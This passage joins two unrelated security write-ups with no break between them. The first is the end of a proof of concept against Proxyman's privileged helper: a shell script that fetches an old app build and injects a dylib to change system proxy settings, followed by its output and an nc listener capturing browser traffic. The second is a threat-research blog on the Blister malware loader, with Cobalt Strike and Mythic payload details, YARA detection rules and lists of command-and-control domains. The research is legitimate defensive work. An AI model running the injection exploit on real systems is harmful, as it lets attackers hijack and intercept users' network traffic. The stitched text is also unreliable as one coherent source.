FILENAME="Proxyman_$VERSION.dmg"
URL="https://github.com/ProxymanApp/Proxyman/releases/download/$VERSION/$FILENAME"
TMP_DIR=$(mktemp -d)
MNT="proxyman"
EXEC_PATH="$TMP_DIR/$MNT/Proxyman.app/Contents/MacOS/Proxyman"
DYLIB=$1
HOST=$2
PORT=$3

set -e

echo "[+] Changing to $TMPDIR"
cp $DYLIB $TMP_DIR; cd $TMP_DIR; mkdir $MNT

echo "[+] Getting $URL..."
wget -q $URL

echo "[+] Mounting DMG..."
hdiutil attach $FILENAME -mountpoint $MNT \
    -nobrowse -noautoopen -quiet

echo "[+] Injecting dylib..."
DYLD_INSERT_LIBRARIES=$DYLIB $EXEC_PATH $HOST $PORT

The exploit script will retrieve the old version of Proxyman, mount it, and inject the compiled dynamic library into it, exploiting the already-installed and up-to-date HelperTool.

$ ./PoC.sh ProxyHelper_PoC.dylib [[[[127.0.0.1 5555]]]]
[+] Changing to /var/folders/m5/h5w99qzx1zqdfj_bf8518h8w0000gn/T/
[+] Getting https://github.com/ProxymanApp/Proxyman/releases/download/1.3.4/Proxyman_1.3.4.dmg...
[+] Mounting DMG...
[+] Injecting dylib...
2023-08-31 16:46:38.856 Proxyman[4504:166167] OSStatus: No error.
2023-08-31 16:46:38.857 Proxyman[4504:166167] OSStatus: No error.
2023-08-31 16:46:38.857 Proxyman[4504:166167] OSStatus: No error.
2023-08-31 16:46:38.857 Proxyman[4504:166167] obj: <__NSXPCInterfaceProxy_HelperToolProtocol: 0x600002364000>
2023-08-31 16:46:38.857 Proxyman[4504:166167] conn: <NSXPCConnection: 0x600003169e00> connection to service named com.proxyman.NSProxy.HelperTool
2023-08-31 16:46:38.956 Proxyman[4504:166202] [+] Proxy set successfully!
2023-08-31 16:46:38.957 Proxyman[4504:166202] [+] HelperTool Version: 1.4.0
2023-08-31 16:46:39.358 Proxyman[4504:166167] [+] Done.

The exploit succeeded, changing the system’s proxy settings to http(s)://127.0.0.1:5555

With the exploit proof-of-concept successful, it is possible to open an nc listener to catch requests being sent from browsers running on the system:

$ networksetup -getwebproxy Ethernet
Enabled: Yes
Server: 127.0.0.1
Port: 5555
Authenticated Proxy Enabled: 0
$ nc -nlvk 5555
CONNECT mesu.apple.com:443 HTTP/1.1
Host: mesu.apple.com
Proxy-Connection: keep-alive
Connection: keep-alive

CONNECT incoming.telemetry.mozilla.org:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
Proxy-Connection: keep-alive
Connection: keep-alive
Host: incoming.telemetry.mozilla.org:443

With the proxy set, an nc listener on the selected port will catch requests from applications that adhere to the system proxy.

Popping Blisters for research: An overview of past payloads and exploring recent developments

1 November 2023 at 12:00

Summary

Blister is a piece of malware that loads a payload embedded inside it. We provide an overview of payloads dropped by the Blister loader based on 137 unpacked samples from the past one and a half years and take a look at recent activity of Blister. The overview shows that since its support for environmental keying, most samples have this feature enabled, indicating that attackers mostly use Blister in a targeted manner. Furthermore, there has been a shift in payload type from Cobalt Strike to Mythic agents, matching with previous reporting. Blister drops the same type of Mythic agent which we thus far cannot link to any public Mythic agents. Another development is that its developers started obfuscating the first stage of Blister, making it more evasive. We provide YARA rules and scripts1 to help analyze the Mythic agent and the packer we observed with it.

Recap of Blister

Blister is a loader that loads a payload embedded inside it and in the past was observed with activity linked to Evil Corp2,3. Matching with public reporting, we have also seen it as a follow-up in SocGholish infections. In the past, we observed Blister mostly dropping Cobalt Strike beacons, yet current developments show a shift to Mythic agents, another red teaming framework.

Elastic Security first documented Blister in December 2021 in a campaign that used malicious installers4. It used valid code signatures referencing the company Blist LLC to pose as a legitimate executable, likely leading to the name Blister. That campaign reportedly dropped Cobalt Strike and BitRat.

In 2022, Blister started solely using the x86-64 instruction set, versus including 32-bit as well. Furthermore, RedCanary wrote observing SocGholish dropping Blister5, which was later confirmed by other vendors as well6.

In August the same year, we observed a new version of Blister. This update included more configuration options, along with an optional domain hash for environmental keying, allowing attackers to deploy Blister in a targeted manner. Elastic Security recently wrote about this version7.

2023 initially did not bring new developments for Blister. However, similar to its previous update, we observed development activity in August. Notably, we saw samples with added obfuscation to the first stage of Blister, i.e. the loader component that is injected into a legitimate executable. Additionally, in July, Unit 428 observed SocGholish dropping Blister with a Mythic agent.

In summary, 2023 brought new developments for Blister, with added obfuscations to the first stage and a new type of payload. The next part of this blog is divided into two parts: firstly, we look back at previous Blister payloads and configurations, and in the second part, we discuss the recent developments.

Looking back at Blister

In early 2023, we observed a SocGholish infection at our security operations center (SOC). We notified the customer and were given a binary that was related to the infection. This turned out to be a Blister sample, with Cobalt Strike as its payload.

We wrote an extractor that worked on the sample encountered at the SOC, but for certain other Blister samples it did not. It turned out that the sample from the SOC investigation belonged to a version of Blister that was introduced in August, 2022, while older samples had a different configuration. After writing an extractor for these older versions, we made an overview of what Blister had been dropping in roughly the past two years.

The samples we analyzed are all available on VirusTotal, the platform we used to find samples. We focus on 64-bit Blister samples, newer samples are not using 32-bit anymore, as far as we know. In total, we found 137 samples we could unpack, 33 samples with the older version and 104 samples with the newer version from 2022.

In the Appendix, we list these samples, where version 1 and 2 refer to the old and new version respectively. The table is sorted on the first seen date of a sample in VirusTotal, where you clearly see the introduction of the update.

Because we want to keep the tables comprehensible, we have split up the data into four tables. For now, it is important to note that Table 2 provides information per Blister sample we unpacked, including the date it was first uploaded to VirusTotal, the version, the label of the payload it drops, the type of payload, and two configuration flags. Furthermore, to have a list of Blister and payload hashes in clear text in the blog, we included these in Table 6. We also included a more complete data set at https://github.com/fox-it/blister-research.

Discussing payloads

Looking at the dropped payloads, we see that it mostly conforms with what has already been reported. In Figure 1, we provide a timeline based on the first seen date of a sample in VirusTotal and the family of the payload. The observed payloads consist of Cobalt Strike, Mythic, Putty, and a test application. Initially, Blister dropped various flavors of Cobalt Strike and later dropped a Mythic agent, which we refer to as BlisterMythic. Recently, we also observed a packer that unpacks BlisterMythic, which we refer to as MythicPacker. Interestingly, we did not observe any samples drop BitRat.

Figure 1, Overview of Blister samples we were able to unpack, based on the first seen date reported in VirusTotal.

From the 137 samples, we were able to retrieve 74 unique payloads. This discrepancy in amount of unique Blister samples versus unique payloads is mainly caused by various Blister samples that drop the same Putty or test application, namely 18 and 22 samples, respectively. This summer has shown a particular increase in test payloads.

Cobalt Strike

Cobalt Strike was dropped through three different types of payloads, generic shellcode, DLL stagers, or obfuscated shellcode. In total, we retrieved 61 beacons, in Table 1 we list the Cobalt Strike watermarks we observed. Watermarks are a unique value linked to a license key. It should be noted that Cobalt Strike watermarks can be changed and hence are not a sound way to identify clusters of activity.

Watermark (decimal)Watermark (hexadecimal)Nr. of beacons
2065460020xc4fa4522
15801038240x5e2e789021
11019917750x41af0f5f38
Table 1, Counted Cobalt Strike watermarks observed in beacons dropped by Blister.

The watermark 206546002, though only used twice, shows up in other reports as well, e.g. a report on an Emotet intrusion9 and a report linking it to Royal, Quantum, and Play ransomware activity10,11. The watermark 1580103824 is mentioned in reports on Gootloader12, but also Cl0p13 and also is the 9th most common beacon watermark, based on our dataset of Cobalt Strike beacons14. Interestingly, 1101991775, the watermark that is most common, is not mentioned in public reporting as far as we can tell.

Cobalt Strike profile generators

In Table 3, we list information on the extracted beacons. In there, we also list the submission path. Most of the submission paths contain /safebrowsing/ and /rest/2/meetings, matching with paths found in SourcePoint15, a Cobalt Strike command-and-control (C2) profile generator. This is only, however, for the regular shellcode beacons, when we look at the obfuscated shellcode and the DLL stager beacons, it seems to use a different C2 profile. The C2 profiles for these payloads match with another public C2 profile generator16.

Domain fronting

Some of the beacons are configured to use “domain fronting”, which is a technique that allows malicious actors to hide the true destination of their network traffic and evade detection by security systems. It involves routing malicious traffic through a content delivery network (CDN) or other intermediary server, making it appear as if the traffic is going to a legitimate or benign domain, while in reality, it’s communicating with a malicious C2 server.

Certain beacons have subdomains of fastly[.]net as their C2 server, e.g. backend.int.global.prod.fastly[.]net or python.docs.global.prod.fastly[.]net. However, the domains they connect to are admin.reddit[.]com or admin.wikihow[.]com, which are legitimate domains hosted on a CDN.

Obfuscated shellcode

In five cases, we observed Blister drop Cobalt Strike by first loading obfuscated shellcode. We included a YARA rule for this particular shellcode in the Appendix.

Performing a retrohunt on VirusTotal yielded only 12 samples, with names indicating potential test files and at least one sample dropping Cobalt Strike. We are unsure whether this is an obfuscator solely used by Evil Corp or whether it is used by other threat actors as well.

Figure 2, Layout of particular shellcode, with denoted steps.

The shellcode is fairly simple, we provide an overview of it in Figure 2. The entrypoint is at the start of the buffer, which calls into the decoding stub. This call instruction automatically pushes the next instruction’s address on the stack, which the decoding stub uses as a starting point to start mutating memory. Figure 3 shows some of these instructions, which are quite distinctive.

Figure 3, Decoding instructions observed in particular shellcode.

At the end of the decoding stub, it either jumps or calls back and then invokes the decryption function. This decryption function uses RC4, but the S-Box is already initialized, thus no key-scheduling algorithm is implemented. Lastly, it jumps to the final payload.

BlisterMythic

Matching with what was already reported by Unit 428, Blister recently started using Mythic agents as its payload. Mythic is one of the many red teaming frameworks on GitHub18. You can use various agents, which are listed on GitHub as well19 and can roughly be compared to a Cobalt Strike beacon. It is possible to write your own Mythic agent, as long as you comply with a set of constraints. Thus far, we keep seeing the same Mythic agent, which we discuss in more detail later on. The first sample dropping Mythic agents was uploaded to VirusTotal on July 24th 2023, just days before initial reportings of SocGholish infections leading to Mythic. In Table 4, we provide the C2 information from the observed Mythic agents.

We observed Mythic either as a Portable Executable (PE) or as shellcode. The shellcode seems to be rare and unpacks a PE file which thus far always resulted in a Mythic agent, in our experience. We discuss this packer later on as well and provide scripts that help with retrieving the PE file it packs. We refer to this specific Mythic agent as BlisterMythic and to the packer as MythicPacker.

In Table 5, we list the BlisterMythic C2 servers we were able to find. Interestingly, the domains were all registered at DNSPod. We also observed this in the past with Cobalt Strike domains we linked to Evil Corp. Apart from this, we also see similarities in the domain names used, e.g. domains consisting of two or three words concatenated to each other and using com as top-level domain (TLD).

Test payloads

Besides red team tooling like Mythic and Cobalt Strike, we also observed Putty and a test application as payloads. Running Putty through Blister does not seem logical and is likely linked to testing. It would only result in Putty not touching the disk and running in memory, which in itself is not useful. Additionally, when we look at the domain hashes in the Blister samples, only the Putty and test application samples in some cases share their domain hash.

Blister configurations

We also looked at the configurations of Blister, from this we can to some extent derive how it is used by attackers. Note that the collection also contains “test samples” from the attacker. Except for the more obvious Putty and test application, some samples that dropped Mythic, for instance, could also be linked to testing. We chose to leave out samples that drop Putty or the test application, leaving 97 samples in total. This means that the samples paint a partly biased picture, though we think it is still valuable and provides a view into how Blister is used.

Environmental keying

Since its update in 2022, Blister includes an optional domain hash, that it computes over the DNS search domain of the machine (ComputerNameDnsDomain). It only continues executing if the hash matches with its configuration, enabling environmental keying.

By looking at the amount of samples that have domain hash verification enabled, we can say something about how Blister is deployed. From the 66 Blister samples, only 6 samples did not have domain hash verification enabled. This indicates it is mostly used in a targeted manner, corresponding with using SocGholish for initial access and reconnaissance and then deploying Blister, for example.

Persistence

Of the 97 samples, 70 have persistence enabled. For persistence, Blister still uses the same method as described by Elastic Security20. It mostly uses IFileOperation COM interface to copy rundll32.exe and itself to the Startup folder, this is significant for detection, as it means that these operations are done by the process DllHost.exe, not the rundll32.exe process that hosts Blister.

Blister trying new things

Blister’s previous update altered the core payload, however, the loader that is injected into the legitimate executable remained unchanged. In August this year, we observed experimental samples on VirusTotal with an obfuscated loader component, hinting at developer activity. Interestingly, we could link these samples to another sample on VirusTotal which solely contained the function body of the loader and another sample that contained a loader with a large set of INT 3 instructions added to it. Perhaps the developer was experimenting with different mutations to see how it influences the detection rate.

Obfuscating the first stage

Recent samples from September 2023 have the loader obfuscated in the same manner, with bogus instructions and excessive jump instructions. These changes make it harder to detect Blister using YARA, as the loader instructions are now intertwined with junk instructions and sometimes are followed by junk data due to the added jump instructions.

Figure 4, Comparison of two loader components from recent Blister samples, left is without obfuscation and right is with obfuscation.

In Figure 4, we compare the two function bodies of the loader, one body which is normally seen in Blister samples and one obfuscated function body, observed in the recent samples. The comparison shows that naïve YARA rules are less likely to trigger on the obfuscated function body. In the Appendix, we provide a Blister rule that tries to detect these obfuscated samples. The added bogus instructions include instructions, such as btc, bts, lahf and cqo, bogus instructions we also observed in the Blister core before, see the core component of SHA256 4faf362b3fe403975938e27195959871523689d0bf7fba757ddfa7d00d437fd4, for example.

Dropping Mythic agents

Apart from an obfuscated loader, Mythic agents currently are the payload of choice. In September and October, we found obfuscated Blister samples only dropping Mythic. Certain samples have low or zero detections on VirusTotal21 at the time of writing, showing that obfuscation does pay off.

We now discuss one sample22 that drops a shellcode eventually executing a Mythic agent. The shellcode unpacks a PE file and executes it. We provide a YARA rule for this packer in the Appendix, which we refer to as MythicPacker. Based on this rule, we did not find other samples, suggesting it is a custom packer. Until now, we have only seen this packer unpacking Mythic agents.

The dropped Mythic agents are all similar and we cannot link them to any public agents thus far. This could mean that Blister developers created their own Mythic agent, though this is uncertain. We provided a YARA rule that matches on all agents we encountered, a VirusTotal retrohunt over the past year resulted in only four samples, all linked to Blister. We think this Mythic agent is likely custom-made.

Figure 5, BlisterMythic configuration decryption.

The agents all share a similar structure, namely an encrypted configuration in the .bss section of the executable. The agent has an encrypted configuration which is decrypted by XORing the size of the configuration with a constant that differs per sample, it seems. For PE files, we have a Python script that can decrypt a configuration. Figure 5 denotes this decryption loop, where the XOR constant is 0x48E12000.

Figure 6, Decrypted BlisterMythic configuration

Dumping the configuration results in a binary blob that contains various information, including the C2 server. Figure 6 shows a hexdump of a snippet from the decrypted configuration. We created a script to dump the decrypted configuration of the BlisterMythic agent in PE format and also a script that unpacks MythicPacker shellcode and outputs a reconstructed PE file, see https://github.com/fox-it/blister-research.

Conclusion

In this post, we provided an overview of observed Blister payloads from the past one and a half years on VirusTotal and also gave insight into recent developments. Furthermore, we provided scripts and YARA rules to help analyze Blister and the Mythic agent it drops.

From the analyzed payloads, we see that Cobalt Strike was the favored choice, but that lately this has been replaced by Mythic. Cobalt Strike was mostly dropped as shellcode and briefly run through obfuscated shellcode or a DLL stager. Apart from Cobalt Strike and Mythic, we saw that Blister test samples are uploaded to VirusTotal as well.

The custom Mythic agent together with the obfuscated loader, are new Blister developments that happened in the past months. It is likely that its developers were aware that the loader component was still a weak spot in terms of static detection. Additionally, throughout the years, Cobalt Strike has received a lot of attention from the security community, with available dumpers and C2 feeds readily available. Mythic is not as popular and allows you to write your own agent, making it an appropriate replacement for now.

References

  1. https://github.com/fox-it/blister-research ↩︎
  2. https://www.mandiant.com/resources/blog/unc2165-shifts-to-evade-sanctions ↩︎
  3. https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/ ↩︎
  4. https://www.elastic.co/security-labs/elastic-security-uncovers-blister-malware-campaign ↩︎
  5. https://redcanary.com/blog/intelligence-insights-january-2022/ ↩︎
  6. https://www.trendmicro.com/en_ie/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html ↩︎
  7. https://www.elastic.co/security-labs/revisiting-blister-new-developments-of-the-blister-loader ↩︎
  8. https://twitter.com/Unit42_Intel/status/1684583246032506880 ↩︎
  9. https://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/ ↩︎
  10. https://www.group-ib.com/blog/shadowsyndicate-raas/ ↩︎
  11. https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html ↩︎
  12. https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/ ↩︎
  13. https://redcanary.com/wp-content/uploads/2022/05/Gootloader.pdf ↩︎
  14. https://research.nccgroup.com/2022/03/25/mining-data-from-cobalt-strike-beacons/ ↩︎
  15. https://github.com/Tylous/SourcePoint ↩︎
  16. https://github.com/threatexpress/random_c2_profile ↩︎
  17. https://twitter.com/Unit42_Intel/status/1684583246032506880 ↩︎
  18. https://github.com/its-a-feature/Mythic ↩︎
  19. https://mythicmeta.github.io/overview/ ↩︎
  20. https://www.elastic.co/security-labs/blister-loader ↩︎
  21. https://www.virustotal.com/gui/file/a5fc8d9f9f4098e2cecb3afc66d8158b032ce81e0be614d216c9deaf20e888ac ↩︎
  22. https://www.virustotal.com/gui/file/f58de1733e819ea38bce21b60bb7c867e06edb8d4fd987ab09ecdbf7f6a319b9 ↩︎

Appendix

YARA rules

rule shellcode_obfuscator
{
    meta:
        os = "Windows"
        arch = "x86-64"
        description = "Detects shellcode packed with unknown obfuscator observed in Blister samples."
        reference_sample = "178ffbdd0876b99ad1c2d2097d9cf776eca56b540a36c8826b400cd9d5514566"
    strings:
        $rol_ror = { 48 C1 ?? ?? ?? 48 C1 ?? ?? ?? 48 C1 ?? ?? ?? }
        $mov_rol_mov = { 4d ?? ?? ?? 49 c1 ?? ?? ?? 4d ?? ?? ?? }
        $jmp = { 49 81 ?? ?? ?? ?? ?? 41 ?? }
    condition:
        #rol_ror > 60 and $jmp and filesize < 2MB and #mov_rol_mov > 60
}

import "pe"
import "math"

rule blister_x64_windows_loader {
    meta:
        os = "Windows"
        arch = "x86-64"
        family = "Blister"
        description = "Detects Blister loader component injected into legitimate executables."
        reference_sample = "343728792ed1e40173f1e9c5f3af894feacd470a9cdc72e4f62c0dc9cbf63fc1, 8d53dc0857fa634414f84ad06d18092dedeb110689a08426f08cb1894c2212d4, a5fc8d9f9f4098e2cecb3afc66d8158b032ce81e0be614d216c9deaf20e888ac"
    strings:
        // 65 48 8B 04 25 60 00 00 00                          mov     rax, gs:60h
        $inst_1 = {65 48 8B 04 25 60 00 00 00}
        // 48 8D 87 44 6D 00 00                                lea     rax, [rdi+6D44h]
        $inst_2 = {48 8D 87 44 6D 00 00}
        // 44 69 C8 95 E9 D1 5B                                imul    r9d, eax, 5BD1E995h
        $inst_3 = {44 ?? ?? 95 E9 D1 5B}
        // 41 81 F9 94 85 09 64                                cmp     r9d, 64098594h
        $inst_4 = {41 ?? ?? 94 85 09 64}
        // B8 FF FF FF 7F                                      mov     eax, 7FFFFFFFh
        $inst_5 = {B8 FF FF FF 7F}
        // 48 8D 4D 48                                         lea     rcx, [rbp+48h]
        $inst_6 = {48 8D 4D 48}
    condition:
        uint16(0) == 0x5A4D and
        all of ($inst_*) and
        pe.number_of_resources > 0 and
        for any i in (0..pe.number_of_resources - 1):
            ( (math.entropy(pe.resources[i].offset, pe.resources[i].length) > 6) and
                pe.resources[i].length > 200000 
            )
}

rule blister_mythic_payload {
    meta:
        os = "Windows"
        arch = "x86-64"
        family = "BlisterMythic"
        description = "Detects specific Mythic agent dropped by Blister."
        reference_samples = "2fd38f6329b9b2c5e0379a445e81ece43fe0372dec260c1a17eefba6df9ffd55, 3d2499e5c9b46f1f144cfbbd4a2c8ca50a3c109496a936550cbb463edf08cd79, ab7cab5192f0bef148670338136b0d3affe8ae0845e0590228929aef70cb9b8b, f89cfbc1d984d01c57dd1c3e8c92c7debc2beb5a2a43c1df028269a843525a38"
    strings:
        $start_inst = { 48 83 EC 28 B? [4-8] E8 ?? ?? 00 00 }
        $for_inst = { 48 2B C8 0F 1F 00 C6 04 01 00 48 2D 00 10 00 00 }
    condition:
        all of them
}

rule mythic_packer
{
    meta:
        os = "Windows"
        arch = "x86-64"
        family = "MythicPacker"
        description = "Detects specific PE packer dropped by Blister."
        reference_samples = "9a08d2db7d0bd7d4251533551d4def0f5ee52e67dff13a2924191c8258573024, 759ac6e54801e7171de39e637b9bb525198057c51c1634b09450b64e8ef47255"
    strings:
        // 41 81 38 72 47 65 74        cmp     dword ptr [r8], 74654772h
        $a = { 41 ?? ?? 72 47 65 74 }
        // 41 81 38 72 4C 6F 61        cmp     dword ptr [r8], 616F4C72h
        $b = { 41 ?? ?? 72 4C 6F 61 }
        // B8 01 00 00 00              mov     eax, 1
        // C3                          retn
        $c = { B8 01 00 00 00 C3 }
    condition:
        all of them and uint8(0) == 0x48
}

Blister payloads listing

First seenVersionPayload familyPayload typeEnvironmental keyingPersistence
2021-12-031Cobalt StrikeshellcodeN/a0
2021-12-051Cobalt StrikeshellcodeN/a0
2021-12-141Cobalt StrikeshellcodeN/a0
2022-01-101Cobalt StrikeshellcodeN/a1
2022-01-111Cobalt StrikeshellcodeN/a1
2022-01-191Cobalt StrikeshellcodeN/a1
2022-01-191Cobalt StrikeshellcodeN/a1
2022-01-311Cobalt StrikeshellcodeN/a1
2022-02-141Cobalt StrikeshellcodeN/a1
2022-02-171Cobalt StrikeshellcodeN/a1
2022-02-221Cobalt StrikeshellcodeN/a1
2022-02-261Cobalt StrikeshellcodeN/a1
2022-03-101Cobalt StrikeshellcodeN/a1
2022-03-141Cobalt StrikeshellcodeN/a1
2022-03-151Cobalt StrikeshellcodeN/a0
2022-03-151Cobalt StrikeshellcodeN/a0
2022-03-181Cobalt StrikeshellcodeN/a0
2022-03-181Cobalt StrikeshellcodeN/a1
2022-03-241PuttyexeN/a0
2022-03-241PuttyexeN/a0
2022-03-301Cobalt StrikeshellcodeN/a1
2022-04-011Cobalt StrikeshellcodeN/a0
2022-04-111Cobalt StrikeshellcodeN/a1
2022-04-221Cobalt StrikeshellcodeN/a1
2022-04-251Cobalt StrikeshellcodeN/a0
2022-06-011Cobalt StrikeshellcodeN/a0
2022-06-021Cobalt StrikeshellcodeN/a1
2022-06-141Cobalt StrikeshellcodeN/a1
2022-07-041Cobalt StrikeshellcodeN/a1
2022-07-191Cobalt StrikeshellcodeN/a0
2022-07-211Cobalt StrikeshellcodeN/a0
2022-08-051Cobalt StrikeshellcodeN/a1
2022-08-292Cobalt Strikeshellcode01
2022-09-022Cobalt Strikeshellcode00
2022-09-292Cobalt Strikeshellcode10
2022-10-182Cobalt Strikeshellcode11
2022-10-182Cobalt Strikeshellcode11
2022-10-182Cobalt Strikeshellcode10
2022-10-182Cobalt Strikeshellcode11
2022-10-212Cobalt Strikeshellcode11
2022-10-212Cobalt Strikeshellcode10
2022-10-242Cobalt Strikeshellcode11
2022-10-262Cobalt Strikeshellcode11
2022-10-262Cobalt Strikeshellcode11
2022-10-282Cobalt Strikeshellcode10
2022-10-312Cobalt Strikeshellcode11
2022-11-022Cobalt Strikeshellcode11
2022-11-032Cobalt Strikeshellcode11
2022-11-072Cobalt Strikeshellcode11
2022-11-082Cobalt Strikeshellcode11
2022-11-172Cobalt Strikeshellcode11
2022-11-222Cobalt Strikeshellcode11
2022-11-302Cobalt Strikeshellcode11
2022-12-012Cobalt Strikeshellcode11
2022-12-012Cobalt Strikeshellcode10
2022-12-012Cobalt Strikeshellcode10
2022-12-022Cobalt Strikeshellcode11
2022-12-052Cobalt Strikeshellcode11
2022-12-122Cobalt Strikeshellcode11
2022-12-132Cobalt Strikeshellcode11
2022-12-232Cobalt Strikeshellcode11
2023-01-062Cobalt Strikeshellcode11
2023-01-162Cobalt Strike obfuscated shellcodeshellcode11
2023-01-162Cobalt Strike obfuscated shellcodeshellcode11
2023-01-162Cobalt Strike obfuscated shellcodeshellcode11
2023-01-172Cobalt Strikeshellcode01
2023-01-172Cobalt Strike obfuscated shellcodeshellcode11
2023-01-202Cobalt Strike obfuscated shellcodeshellcode11
2023-01-202Cobalt Strike obfuscated shellcodeshellcode11
2023-01-242Cobalt Strikeshellcode11
2023-01-262Cobalt Strikeshellcode11
2023-01-262Cobalt Strikeshellcode11
2023-02-022Cobalt Strikeshellcode11
2023-02-022Test applicationshellcode10
2023-02-022Test applicationshellcode10
2023-02-022Puttyexe10
2023-02-022Test applicationshellcode10
2023-02-152Puttyexe10
2023-02-152Test applicationshellcode10
2023-02-152Puttyexe10
2023-02-152Test applicationshellcode10
2023-02-172Cobalt Strike stagerexe11
2023-02-272Cobalt Strike stagerexe11
2023-02-282Cobalt Strike stagerexe11
2023-03-062Cobalt Strike stagerexe11
2023-03-062Cobalt Strike stagerexe11
2023-03-062Cobalt Strike stagerexe11
2023-03-152Cobalt Strike stagerexe10
2023-03-192Cobalt Strike stagerexe11
2023-03-231Cobalt StrikeshellcodeN/a1
2023-03-282Cobalt Strike stagerexe11
2023-03-282Cobalt Strike stagerexe10
2023-04-032Cobalt Strike stagerexe11
2023-05-252Cobalt Strike stagerexe01
2023-05-262Cobalt Strikeshellcode11
2023-06-112Test applicationshellcode10
2023-06-112Puttyexe10
2023-06-112Puttyexe10
2023-07-242BlisterMythicexe11
2023-07-272BlisterMythicexe11
2023-08-092Test applicationshellcode10
2023-08-092Test applicationshellcode10
2023-08-092Test applicationshellcode10
2023-08-092Test applicationshellcode10
2023-08-092Test applicationshellcode10
2023-08-092Test applicationshellcode10
2023-08-092Test applicationshellcode10
2023-08-092Test applicationshellcode10
2023-08-092Test applicationshellcode10
2023-08-092Test applicationshellcode10
2023-08-092Test applicationshellcode10
2023-08-102Puttyshellcode10
2023-08-102Puttyshellcode10
2023-08-102Puttyshellcode10
2023-08-102Puttyshellcode10
2023-08-102Puttyshellcode10
2023-08-102Puttyshellcode10
2023-08-102Puttyshellcode10
2023-08-102Puttyshellcode10
2023-08-102Puttyshellcode10
2023-08-112BlisterMythicexe10
2023-08-152Test applicationshellcode10
2023-08-172BlisterMythicexe11
2023-08-182MythicPackershellcode10
2023-09-052MythicPackershellcode00
2023-09-052MythicPackershellcode01
2023-09-082Test applicationshellcode10
2023-09-082Test applicationshellcode10
2023-09-082Test applicationshellcode10
2023-09-082Puttyshellcode10
2023-09-082Puttyshellcode10
2023-09-082Test applicationshellcode10
2023-09-192BlisterMythicexe11
2023-09-212MythicPackershellcode10
2023-09-212MythicPackershellcode10
2023-10-032MythicPackershellcode10
2023-10-102MythicPackershellcode10
Table 2, Information on unpacked Blister samples.

Cobalt Strike beacons

WatermarkDomainURI
1101991775albertonne[.]com/safebrowsing/d4alBmGBO/HafYg4QZaRhMBwuLAjVmSPc
1101991775astradamus[.]com/Collect/union/QXMY8BHNIPH7
1101991775backend.int.global.prod.fastly[.]net/Detect/devs/NJYO2MUY4V
1101991775cclastnews[.]com/safebrowsing/d4alBmGBO/UaIzXMVGvV3tS2OJiKxSzyzbh4u1
1101991775cdp-chebe6efcxhvd0an.z01.azurefd[.]net/Detect/devs/NJYO2MUY4V
1101991775deep-linking[.]com/safebrowsing/fDeBjO/2hmXORzLK7PkevU1TehrmzD5z9
1101991775deep-linking[.]com/safebrowsing/fDeBjO/dMfdNUdgjjii3Ccalh10Mh4qyAFw5mS
1101991775deep-linking[.]com/safebrowsing/fDeBjO/vnZNyQrwUjndCPsCUXSaI
1101991775diggin-fzbvcfcyagemchbq.z01.azurefd[.]net/restore/how/3RG4G5T87
1101991775edubosi[.]com/safebrowsing/bsaGbO6l/ybGoI3wmK2uF9w9aL5qKmnS8IZIWsJqhp
1101991775e-sistem[.]com/Detect/devs/NJYO2MUY4V
1101991775ewebsofts[.]com/safebrowsing/3Tqo/UMskN3Lh0LyLy8BfpG1Bsvp
1101991775expreshon[.]com/safebrowsing/fDeBjO/2hmXORzLK7PkevU1TehrmzD5z9
1101991775eymenelektronik[.]com/safebrowsing/dfKa/B58qAhJ0AEF7aNwauoqpAL8
1101991775gotoknysna.com.global.prod.fastly[.]net/safebrowsing/fDeBjO/2hmXORzLK7PkevU1TehrmzD5z9
1101991775henzy-h6hxfpfhcaguhyf5.z01.azurefd[.]net/Detect/devs/NJYO2MUY4V
1101991775lepont-edu[.]com/safebrowsing/dfKa/9T1BuXpqEDg9tx53mQRU6
1101991775lindecolas[.]com/safebrowsing/d4alBmGBO/UaIzXMVGvV3tS2OJiKxSzyzbh4u1
1101991775lodhaamarathane[.]com/safebrowsing/dfKa/9T1BuXpqEDg9tx53mQRU6
1101991775mail-adv[.]com/safebrowsing/bsaGbO6l/dl1sskHxt1uGDGUnLDB5gxn4vYZQK1kaG6
1101991775mainecottagebythesea[.]com/functionalStatus/cjdl-CLe4j-XHyiEaDqQx
1101991775onscenephotos[.]com/restore/how/3RG4G5T87
1101991775promedia-usa[.]com/safebrowsing/d4alBmGBO/HafYg4QZaRhMBwuLAjVmSPc
1101991775python.docs.global.prod.fastly[.]net/Collect/union/QXMY8BHNIPH7
1101991775realitygangnetwork[.]com/functionalStatus/qPprp9dtVhrGV3R3re5Xy4M2cfQo4wB
1101991775realitygangnetwork[.]com/functionalStatus/vFi8EPnc9zJTD0GgRPxggCQAaNb
1101991775sanfranciscowoodshop[.]com/safebrowsing/dfKa/GgVYon5zhYu5L7inFbl1MZEv7RGOnsS00b
1101991775sohopf[.]com/apply/admin_/99ZSSAHDH
1101991775spanish-home-sales[.]com/safebrowsing/d4alBmGBO/EB-9sfMPmsHmH-A7pmll9HbV0g
1101991775steveandzina[.]com/safebrowsing/d4alBmGBO/mr3lHbohEvZa0mKDWWdwTV5Flsxh
1101991775steveandzina[.]com/safebrowsing/d4alBmGBO/YwTM1CK0mBV1Y7UDagpjP
1101991775websterbarn[.]com/safebrowsing/fDeBjO/CGZcHKnX3arVCfFp98k8
158010382410.158.128[.]50
1580103824bimelectrical[.]com/safebrowsing/7IAMO/hxNTeZ8lBNYqjAsQ2tBRS
1580103824bimelectrical[.]com/safebrowsing/7IAMO/Jwee0NMJNKn9sDD8sUEem4g8jcB2v44UINpCIj
1580103824bookmark-tag[.]com/safebrowsing/eMUgI4Z/3RzgDBAvgg3DQUn8XtN8l
1580103824braprest[.]com/safebrowsing/d5pERENa/3tPCoNwoGwXAvV1w1JAS-OOPyVYxL1K2styHFtbXar7ME
1580103824change-land[.]com/safebrowsing/TKc3hA/DzwHHcc8y8O9kAS7cl4SDK0e6z0KHKIX9w7
1580103824change-land[.]com/safebrowsing/TKc3hA/nLTHCIhzOKpdFp0GFHYBK-0bRwdNDlZz6Qc
